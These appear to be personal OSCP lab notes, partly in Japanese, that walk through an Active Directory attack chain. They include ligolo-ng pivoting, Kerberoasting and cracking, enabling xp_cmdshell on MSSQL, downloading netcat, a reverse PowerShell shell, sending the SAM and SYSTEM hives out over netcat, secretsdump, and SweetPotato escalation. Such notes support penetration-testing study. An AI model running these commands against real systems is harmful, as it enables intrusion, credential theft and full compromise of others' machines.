<pivotting technique>

1. Transfer the agent file to the machine hovering over both Network segments
wget http://192.168.45.173/agent.exe -outfile agent.exe

2. Start the ligolo server 
./proxy -selfcert -laddr 0.0.0.0:443

3. Start the ligolo agent to connect to the server 
./agent.exe -connect 192.168.45.173:443 -ignore-cert


<internal machine>



ここで、internal machine である、DCにもアクセス出来る様になる。


impacket-GetUserSPNs -request -dc-ip 10.10.138.146 oscp.exam/Eric.Wallows





hashcat -m 13100 kerberoas_hash /usr/share/wordlists/rockyou.txt
sql_svc の password が、 Dolphin1と分かる。


impacket-mssqlclient sql_svc:Dolphin1@10.10.138.148 -windows-auth


EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;


EXEC xp_cmdshell ' whoami '



listener_add --addr 0.0.0.0:888 --to 0.0.0.0:888
listener_add --addr 0.0.0.0:4444 --to 0.0.0.0:4444
listener_add --addr 0.0.0.0:80 --to 0.0.0.0:80
listener_add --addr 0.0.0.0:8000 --to 0.0.0.0:8000






( なぜかエラーになった  )  EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.138.147nc64.exe C:\Windows\Temp\nc64.exe';
EXEC xp_cmdshell 'powershell -Command "(New-Object Net.WebClient).DownloadFile(''http://10.10.138.147/nc64.exe'',''C:\Users\Public\nc64.exe'')"';




EXEC xp_cmdshell 'C:\Users\Public\nc64.exe 10.10.138.147 4444 -e powershell'


(4444 にて、nc で待ち受ける)



C:\windows.old\windows\system32>nc64.exe 10.10.149.138 5555 < SAM
C:\windows.old\windows\system32>.\nc64.exe 10.10.149.138 5555 < SYSTEM

nc -lvnp 5555 > SAM
nc -lvnp 5555 > SYSTEM





impacket-secretsdump -sam SAM -system SYSTEM LOCAL



 .\SweetPotato -t * -p shell.exe -l 1235

このマシンのエスカレは、sweetpotato で出来る。




impacket-secretsdump -sam SAM -system SYSTEM LOCAL



	

https://medium.com/@saintlafi/pivoting-and-tunneling-for-oscp-and-beyond-cheat-sheet-3435d1d6022

https://zenn.dev/megapachirisu/articles/bb0e9beb3f20ae

https://zenn.dev/codingotter/articles/79590426fecee5#chisel-dynamic-port-forwarding


https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9

https://medium.com/@redfanatic7/guide-to-pivoting-using-ligolo-ng-efd36b290f16

Ligolo-ng Accessing Localhost Ports




